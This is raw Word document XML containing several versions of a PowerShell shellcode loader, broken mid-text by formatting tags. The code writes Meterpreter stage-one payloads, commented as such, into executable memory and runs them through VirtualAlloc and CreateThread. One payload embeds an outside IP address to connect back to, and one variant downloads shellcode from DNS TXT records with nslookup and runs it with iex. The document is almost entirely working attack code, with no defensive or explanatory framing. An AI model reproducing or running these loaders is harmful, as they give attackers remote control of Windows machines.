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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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$code = '[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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"kernel32.dll")]public static extern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VirtualAlloc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lpAddress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dwSize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flAllocationType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flProtect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);</w:t>
      </w:r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spellStart"/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"kernel32.dll")]</w:t>
      </w:r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public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static extern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CreateThread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lpThreadAttributes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dwStackSize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lpStartAddress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lpParameter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dwCreationFlags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lpThreadId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);[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("msvcrt.dll")]public static extern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memset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dest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src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count);</w:t>
      </w:r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'</w:t>
      </w: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;$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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= Add-Type -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memberDefinition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$code -Name "Win32" -namespace Win32Functions -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passthru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;[Byte[]];</w:t>
      </w:r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Byte[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]]$sc64 = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,0x0a,0x20,0xb4,0x67,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRP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Byte[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]]$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= $sc64</w:t>
      </w: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;$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size = 0x1000;if ($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sc.Length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-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gt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0x1000) {$size = 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sc.Length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};$x=$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::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VirtualAlloc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(0,0x1000,$size,0x40);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF" w:rsidP="0099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for ($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=0;$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-le ($sc.Length-1);$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++) {$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::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memset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([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]($x.ToInt32()+$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), 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], 1)};$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::</w:t>
      </w:r>
      <w:proofErr w:type="spell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CreateThread</w:t>
      </w:r>
      <w:proofErr w:type="spell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(0,0,$x,0,0,0);for (;;) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart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{ Start</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF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-sleep 60 };</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF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# Import required functions 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$code = @"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spellStart"/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"kernel32.dll")]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public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static extern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VirtualAlloc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lpAddress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dwSize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flAllocationType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flProtect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);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spellStart"/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"kernel32.dll")]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public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static extern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CreateThread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lpThreadAttributes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dwStackSize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lpStartAddress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lpParameter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dwCreationFlags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lpThreadId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);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spellStart"/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DllImport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"msvcrt.dll")]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public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static extern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memset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dest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src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,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uint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count);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"@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= Add-Type -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memberDefinition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$code -Name "Win32" -namespace Win32Functions -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passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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meterpreter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stage 1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Byte[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]]$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= 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x</w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x6e,0x65,0x74,0x00,0x68,0x77,0x69,0x6e,0x69,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x6a,0x00,0x54,0x68,0x3a,0x56,0x79,0xa7,0xff,0xd5,0xeb,0x5f,0x5b,0x31,0xc9,0x51,0x51,0x6a,0x03,0x51,0x51,0x68,0xfb,0x20,0x00,0x00,0x53,0x50,0x68,0x57,0x89,0x9f,0xc6,0xff,0xd5,0xeb,0x48,0x59,0x31,0xd2,0x52,0x68,0x00,0x32,0xa0,0x84,0x52,0x52,0x52,0x51,0x52,0x50,0x68,0xeb,0x55,0x2e,0x3b,0xff,0xd5,0x89,0xc6,0x6a,0x10,0x5b,0x68,0x80,0x33,0x00,0x00,0x89,0xe0,0x6a,0x04,0x50,0x6a,0x1f,0x56,0x68,0x75,0x46,0x9e,0x86,0xff,0xd5,0x31,0xff,0x57,0x57,0x57,0x57,0x56,0x68,0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1a,0x4b,0x74,0x10,0xeb,0xd5,0xeb,0x49,0xe8,0xb3,0xff,0xff,0xff,0x2f,0x63,0x51,0x62,0x46,0x00,0x00,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x68,0x00,0x00,0x40,0x00,0x57,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x53,0x89,0xe7,0x57,0x68,0x00,0x20,0x00,0x00,0x53,0x56,0x68,0x12,0x96,0x89,0xe2,0xff,0xd5,0x85,0xc0,0x74,0xcd,0x8b,0x07,0x01,0xc3,0x85,0xc0,0x75,0xe5,0x58,0xc3,0xe8,0x51,0xff,0xff,0xff,0x31,0x37,0x38,0x2e,0x33,0x32,0x2e,0x37,0x32,0x2e,0x31,0x39,0x34,0x00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# Calculate correct size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param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for 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VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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$size = 0x1000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if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($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sc.Length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-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gt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0x1000) {$size = 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sc.Length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}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# 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Allocate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memory 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$x=$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VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(0,0x1000,$size,0x40)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for ($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=0;$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-le ($sc.Length-1);$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++) {$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::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memset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([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IntPtr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]($x.ToInt32()+$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), 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[$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i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], )}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Try {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    $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winFunc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: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CreateThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(0,0,$x,0,0,0)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    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sleep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100000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  }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Catch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{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 [</w:t>
      </w:r>
      <w:proofErr w:type="spell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system.exception</w:t>
      </w:r>
      <w:proofErr w:type="spell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]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00196903" w:rsidRPr="00196903" w:rsidRDefault="00196903" w:rsidP="0019690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  "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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>caught</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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val="en-US" w:eastAsia="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve"> a system exception"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00196903" w:rsidRPr="00196903" w:rsidRDefault="00196903" w:rsidP="00196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nl-NL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196903">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="nl-NL"/>
        </w:rPr>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00845C8D" w:rsidRDefault="00845C8D"/>
    <w:p w:rsidR="00996BFF" w:rsidRDefault="00996BFF"/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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> # Functions for creating a thread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$code = @"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[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DllImport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gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"kernel32.dll")]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96BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public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static extern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VirtualAlloc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lpAddress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dwSize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flAllocationType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flProtect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);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[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DllImport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gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"kernel32.dll")]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96BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public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static extern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CreateThread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lpThreadAttributes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dwStackSize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lpStartAddress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lpParameter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dwCreationFlags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lpThreadId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>);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[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DllImport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gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"msvcrt.dll")]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96BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>public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static extern 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memset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dest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src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996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uint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count);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"@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96BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>function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GetShellCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>($hostname)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{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$result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iex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"cmd.exe /c `"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nslookup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 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>querytype</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>=txt -timeout=5 $hostname 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NUL`""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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellarray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= ""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lastRenderedPageBreak/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foreach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ($line in $result)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    {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    $line=$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line.trim</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>line.contains</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>("`""))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        {$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellarray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= $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line.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"`"")[1].trim()}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    }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"$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellarray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"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   }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"Got the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shellcode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from txt records"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283ECC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# Thread control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$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winFunc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= Add-Type -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memberDefinition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$code -Name "Win32" -namespace Win32Functions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BF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96BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter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stage 1, this one must be converted to proper byte array first.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[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Byte[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]]$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc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=   </w:t>
      </w:r>
      <w:r w:rsidR="00283ECC" w:rsidRPr="00283ECC">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x01,0xbb,0x0a,0x20,0xb4,0x67,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x04,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x83,0xc4,0x20,0x5e,0x6a,0x40,0x41,0x59,0x68,0x00,0x10,0x00,0x00,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x48,0x01,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xe1,0x41,0xff,0xe7;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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> # Calculate correct size </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>param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for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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$size = 0x1000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996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if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($</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc.Length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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gt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0x1000) {$size = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sc.Length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}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# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Allocate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memory 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$x=$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>winFunc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00996BFF">
        <w:rPr>
          <w:color w:val="000000"/>
